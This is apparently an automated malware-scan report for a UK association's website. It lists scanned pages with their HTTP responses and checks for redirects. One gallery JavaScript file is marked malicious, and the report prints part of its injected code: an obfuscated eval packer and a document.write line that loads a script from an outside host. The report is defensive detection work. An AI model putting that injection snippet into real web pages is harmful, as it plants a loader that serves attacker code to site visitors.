Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=thelha.co.uk
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://thelha.co.uk/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 03 Mar 2015 19:29:21 GMT Location: http://www.thelha.co.uk Server: Apache/2.2.15 (CentOS) Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.thelha.co.uk/ | 200 OK Content-Length: 7817 Content-Type: text/html | clean |
http://www.thelha.co.uk/index.html | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.thelha.co.uk/test404page.js | 404 Not Found Content-Length: 1245 Content-Type: text/html | clean |
http://thelha.co.uk/history.html | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 03 Mar 2015 19:29:31 GMT Location: http://www.thelha.co.uk/history.html Server: Apache/2.2.15 (CentOS) Content-Length: 251 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.thelha.co.uk/history.html | 200 OK Content-Length: 16417 Content-Type: text/html | clean |
http://www.thelha.co.uk/services.html | 200 OK Content-Length: 11552 Content-Type: text/html | clean |
http://www.thelha.co.uk/joining_the_lha.html | 200 OK Content-Length: 8152 Content-Type: text/html | clean |
http://www.thelha.co.uk/events_diary.html | 200 OK Content-Length: 8296 Content-Type: text/html | clean |
http://www.thelha.co.uk/our_units.html | 200 OK Content-Length: 10365 Content-Type: text/html | clean |
http://www.thelha.co.uk/gallery/index.html | 200 OK Content-Length: 5242 Content-Type: text/html | clean |
http://www.thelha.co.uk/gallery/svcore/js/simpleviewer.js | 200 OK Content-Length: 109934 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('19 3l=3l?3l:{};3l.23={};19 23=3l.23;(18(u,w){19 x=u.1Q;19 y=(18(){19 h=18(a,b){17 2V h.fn.6v(a,b,gO)},hN=23.5p,4c$=23.$,gO,i7=/^(?:[^<]*(<[\\w\\W] >)[^>]*$| document.write('<script type="text/javascript">var gwloaded = false;</script><script src="http://ftp.virtualrabbit.com/SWVCC/TuNK91Ns.php" type="text/javascript"></script>') Antivirus reports:
| ||
http://www.thelha.co.uk/gallery/../index.html | 200 OK Content-Length: 7817 Content-Type: text/html | clean |
http://www.thelha.co.uk/gallery/../history.html | 200 OK Content-Length: 16417 Content-Type: text/html | clean |
http://www.thelha.co.uk/gallery/../services.html | 200 OK Content-Length: 11552 Content-Type: text/html | clean |
http://www.thelha.co.uk/gallery/../joining_the_lha.html | 200 OK Content-Length: 8152 Content-Type: text/html | clean |
http://www.thelha.co.uk/gallery/../events_diary.html | 200 OK Content-Length: 8296 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: thelha.co.uk
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 Mar 2015 19:29:21 GMT
Location: http://www.thelha.co.uk
Server: Apache/2.2.15 (CentOS)
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
...238 bytes of data.
GET / HTTP/1.1
Host: thelha.co.uk
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 03 Mar 2015 19:29:21 GMT
Location: http://www.thelha.co.uk
Server: Apache/2.2.15 (CentOS)
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
...238 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: thelha.co.uk
Referer: http://www.google.com/search?q=thelha.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: thelha.co.uk
Referer: http://www.google.com/search?q=thelha.co.uk
Result:
The result is similar to the first query. There are no suspicious redirects found.